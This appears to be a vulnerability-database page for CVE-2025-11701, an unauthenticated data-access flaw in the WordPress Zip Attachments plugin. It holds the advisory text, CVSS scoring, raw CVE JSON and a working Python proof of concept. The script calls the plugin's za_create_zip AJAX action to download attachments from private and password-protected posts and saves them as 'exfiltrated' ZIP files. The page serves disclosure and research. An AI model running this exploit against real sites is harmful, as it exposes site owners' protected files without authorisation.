Security Vulnerability Report
中文
CVE-2025-11701 CVSS 5.3 MEDIUM

CVE-2025-11701

Published: 2025-10-15 09:15:43
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Zip Attachments plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check as well as missing post status validation in the za_create_zip_callback function in all versions up to, and including, 1.6. This makes it possible for unauthenticated attackers to download attachments from private and password-protected posts.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Zip Attachments <= 1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11701 PoC - Zip Attachments Plugin Unauthorized Access # Vulnerability: Missing capability check and post status validation # Affected: Zip Attachments plugin <= 1.6 import requests # Target WordPress site target_url = "http://target-wordpress-site.com" # WordPress AJAX endpoint ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Step 1: Identify target post IDs (private or password-protected posts) # Attackers may enumerate post IDs or obtain them from other sources target_post_ids = [123, 456, 789] # Replace with actual private post IDs # Step 2: Send unauthenticated request to trigger za_create_zip_callback for post_id in target_post_ids: payload = { "action": "za_create_zip", "post_ids[]": post_id } # No authentication required (PR:N) response = requests.post(ajax_url, data=payload) if response.status_code == 200 and response.content: # Save the downloaded ZIP containing protected attachments filename = f"exfiltrated_post_{post_id}.zip" with open(filename, "wb") as f: f.write(response.content) print(f"[+] Successfully exfiltrated attachments from post {post_id}") else: print(f"[-] Failed to access post {post_id}") # Note: This PoC demonstrates how unauthenticated attackers can # download attachments from private and password-protected posts # without any capability check or post status validation.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11701", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:42.910", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Zip Attachments plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check as well as missing post status validation in the za_create_zip_callback function in all versions up to, and including, 1.6. This makes it possible for unauthenticated attackers to download attachments from private and password-protected posts."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "http://plugins.trac.wordpress.org/browser/zip-attachments/tags/1.6/zip-attachments.php#L46", "source": "[email protected]"}, {"url": "http://plugins.trac.wordpress.org/browser/zip-attachments/tags/1.6/zip-attachments.php#L95", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e166d52d-73d1-4572-b9cc-ab935b05e13c?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.